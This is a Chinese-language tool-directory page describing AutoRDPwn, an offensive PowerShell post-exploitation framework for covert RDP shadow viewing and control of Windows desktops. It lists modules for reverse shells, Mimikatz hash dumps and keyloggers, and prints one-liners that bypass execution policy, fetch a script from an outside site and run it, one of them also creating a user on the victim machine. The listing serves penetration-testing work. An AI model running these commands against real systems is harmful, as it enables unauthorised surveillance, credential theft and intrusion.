Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
AutoRDPwn — 影子攻击框架 | Kitploit
工具/GitHubGitHub/joelgmsec/autordpwn
密码破解权限提升Payload生成横向移动后渗透利用渗透测试红队远程访问工具
GitHubjoelgmsec/autordpwn

AutoRDPwn

影子攻击框架

查看仓库
1.1k4994年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
网站

AutoRDPwn

AutoRDPwn 是一个基于 Powershell 的后渗透框架,主要用于自动化针对 Microsoft Windows 计算机的 Shadow 攻击。此漏洞(被微软列为一项功能)允许远程攻击者在未经受害者同意的情况下查看其桌面,甚至根据需要控制它,仅使用操作系统自带的工具。

得益于附加模块,可以通过 Netcat 获得远程 Shell,使用 Mimikatz 转储系统哈希,加载远程键盘记录器等等。所有这一切,通过一个完全直观的菜单,支持七种不同的语言。

此外,还可以通过一系列参数在反向 Shell 中使用它,这些参数在用法部分中有描述。

要求

Powershell 4.0 或更高版本

更改

版本 5.1

• 修复了许多错误

• 界面美化并改进了等待时间

• 通过系统设置支持代理感知连接

• 现在可以通过下载 .zip 文件离线使用该工具

• 按回车键自动检测语言

• Invoke-DCOM 已被 SharpRDP 替换

• PowerUp 已被 Invoke-PrivescCheck 替换

• 在受害者机器上创建自动清理子程序

• 新模块可用:使用 AES 加密的 SMB Shell

• 新模块可用:使用 RunAs 切换用户

*其余更改可参见 CHANGELOG 文件

用法

此应用程序可以在本地、远程或用于在团队间跳板使用。

当在反向 Shell 中远程使用时,需要使用以下参数:

参数描述
-admin / -noadmin根据我们拥有的权限,使用其中一个
-nogui这将避免加载菜单和一些颜色,确保其功能正常
-lang我们将选择我们的语言(英语、西班牙语、法语、德语、意大利语、俄语或葡萄牙语)
-option与菜单一样,我们可以选择如何发起攻击
-shadow我们将决定是查看还是控制远程设备
-createuser此参数可选,将在受害者机器上创建 AutoRDPwn:AutoRDPwn 用户
-noclean禁用撤销受害者计算机上所有更改的过程

单行本地执行:

root@kitploit:~
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"

单行远程执行示例:

root@kitploit:~
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1 -admin -nogui -lang English -option 4 -shadow control -createuser"

详细使用指南可访问以下链接:

https://darkbyte.net/autordpwn-la-guia-definitiva

截图

AutoRDPwn1_en AutoRDPwn2_en

许可证

本项目遵循 GNU 3.0 许可证 - 详情请参阅 LICENSE 文件。

鸣谢与致谢

该框架由 Joel Gámez Molina // @JoelGMSec 从零开始创建和设计。

某些模块使用了第三方代码、脚本和工具,特别是:

• Chachi-Enumerator 由 Luis Vacas --> https://github.com/Hackplayers/PsCabesha-tools

• Invoke-Phant0m 由 Halil Dalabasmaz --> https://github.com/hlldz/Invoke-Phant0m

• Invoke-PowerShellTcp 由 Nikhil "SamratAshok" Mittal --> https://github.com/samratashok/nishang

• Invoke-TheHash 由 Kevin Robertson --> https://github.com/Kevin-Robertson/Invoke-TheHash

• Mimikatz 由 Benjamin Delpy --> https://github.com/gentilkiwi/mimikatz

• PsExec 由 Mark Russinovich --> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec

• RDP Wrapper 由 Stas'M Corp. --> https://github.com/stascorp/rdpwrap

• SharpRDP 由 Steven F --> https://github.com/0xthirteen/SharpRDP

以及更多因篇幅限制未能列出的工具。感谢他们所有人以及他们的出色工作。

联系方式

本软件不提供任何形式的保证。其使用仅限于教育环境和/或经客户同意进行的安全审计。我对任何滥用或由此造成的任何可能的损害不承担责任。

更多信息,可在 Twitter 上找到我 @JoelGMSec,以及我的博客 darkbyte.net。

支持

您可以通过请我喝咖啡来支持我的工作:

buymeacoffe

下载工具